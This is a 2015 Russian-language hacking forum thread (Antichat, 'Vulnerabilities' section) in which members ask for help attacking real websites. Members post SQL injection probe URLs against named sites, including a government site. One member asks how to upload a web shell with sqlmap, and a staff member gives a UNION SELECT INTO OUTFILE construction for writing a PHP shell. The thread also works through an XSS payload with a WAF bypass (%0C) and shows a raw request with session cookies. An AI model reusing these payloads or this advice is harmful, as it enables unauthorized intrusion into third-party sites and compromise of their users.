Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    ну как.
    http://www.haynes.com/products?sear...=2009&make=Boatian&model=BT125-3'+and+1=1+--+ - TRUE
    http://www.haynes.com/products?sear...=2009&make=Boatian&model=BT125-3'+and+1=2+--+ - FALSE

    А так же http://www.haynes.com/products?sear...09&make=Boatian&model=BT125-3'+Order+by+2+--+ - TRUE

    новость вылазиет при true. так же при некоторых командах вылазиет белая страничка

    2) А тут можно что нибудь сделать?
    http://www.ok.gov/triton/modules/newsroom/newsroom.php?id=109+and+substr(123,1,1)=1+--+
    http://www.ok.gov/triton/modules/newsroom/newsroom.php?id=109+order+by+1+--+
    http://www.ok.gov/triton/modules/newsroom/newsroom.php?id=109+and+substr('a',1,1)='a'
     
    #281 Br@!ns, 2 Jul 2015
    Last edited: 3 Jul 2015
  2. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Всегда белая страница. Может быть вы HTTP запросы приведете?
    Копайте в сторону Oracle.
     
    #282 randman, 3 Jul 2015
    Last edited: 3 Jul 2015
    Br@!ns likes this.
  3. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    [​IMG]
    в FireFox действительно все белое, Опера нормально отображает
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    нужна реальная кавычка, не урленкод
     
    _________________________
  5. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    Code:
    http://www.everynight.co.uk/imageViewer.asp?imageID=11206 and 1=1
    В общем... Access, брут tables ничего не нашёл. Что делать дальше?:(
     
  6. Filipp

    Filipp Elder - Старейшина

    Joined:
    10 May 2015
    Messages:
    257
    Likes Received:
    57
    Reputations:
    31
    Есть Blind'овая скуля, проверил права -- ROOT. Нашел phpinfo, оттуда взял путь, нашел врайтабельную папку, вроде как все норм. Кручу sqlmap'ом ибо руками блайнд крутить это маразм. Попробовал залить шелл и наткнулся на не очень приятный момент, sqlmap не спрашивает путь для заливки шелла. Скуля в поле password, а там функция шифрования в md5 дает ошибку с раскрытием путей. Sqlmap берет этот путь и пытается залить шелл по тому пути, а меня не спрашивает. Как указать кастомный путь в таком случае?
     
  7. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Заливайте безо всяких SQLMap.

    Просто используйте конструкцию

    union select '<?php ?>' into outfile '/' , независимо от вывода результата.

    Возможно, придётся поподбирать количество столбцов.

    Остальных проблем, судя по вашему рассказу (MQ off, FilePriv on, FPD true), нет. Всё должно получиться.
     
    _________________________
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    _________________________
  9. man4747

    man4747 New Member

    Joined:
    23 Jun 2015
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
  10. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
  11. man4747

    man4747 New Member

    Joined:
    23 Jun 2015
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
  12. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
  13. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Code:
    "><img srcset=",,,,,x"onerror="alert(1)">
    Чтобы сработала XSS осталось добится, чтобы вставился пробел вмежду тегами img srcset. Символы \ и / заменяются на %20. Подскажите куда можно еще копать?
     
  14. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    где сам инъект? на что там waf?
     
    _________________________
  15. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Вывод
    <input type="hidden" name="page_location" value="/search/"><img%20srcset=",,,,,x"onerror="alert(1)">">

    Что Вы имеете ввиду под вопросом "где сам инъект?".
    waf на пробелы и слешы. Слешы черт с ним, а вот пробелы - не могу разделить атрибут от тега
     
  16. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    как вариант: %0C
    POC: http://jsfiddle.net/4qgk5qyj/
     
    _________________________
  17. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Code:
    <input type="hidden" name="page_location" value="/search/"><img%0csrcset=",,,,,x"onerror="alert(1)">">
    %0C так и остается в исходном коде, также как и пробел заменяется на %20
     
  18. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    отправьте данные через сниффер, например burp. и скиньте уже сайт в лс
     
    _________________________
  19. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Code:
    GET /search/%22%3E%3Cimg%20srcset%3D%22%2C%2C%2C%2C%2Cx%22onerror%3D%22alert(1)%22%3E HTTP/1.1
    Host: *********
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: *********
    Cookie: PHPSESSID=p7f3b38uuh1icqqqndscb75a10; Lang=ru; ShopID=37; __utma=244353110.90581892.1436196504.1436227051.1436260016.5; __utmc=244353110; __utmz=244353110.1436196504.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jv_enter_ts_dUv23LxxhD=1436196515709; jv_visits_count_dUv23LxxhD=1; jv_pages_count_dUv23LxxhD=107; jv_gui_state_dUv23LxxhD=WIDGET; jv_cm_dUv23LxxhD=ws; jv_client_id_dUv23LxxhD=242556.2oZiZbl%2Bz3jZ%2Fn3i7hwsPj8u5Hm4%2Byfv2aQVwObJGqY; jv_invitation_time_dUv23LxxhD=1436260532076; jv_close_time_dUv23LxxhD=1436220689308; __utmb=244353110.14.9.1436260532079; _ym_visorc_20996566=w; jv_sess_id_dUv23LxxhD=sbd62ebf98ea95eb5d817667c74a59689; __utmt=1
    Connection: keep-alive
     
  20. lindau

    lindau New Member

    Joined:
    8 Jul 2015
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0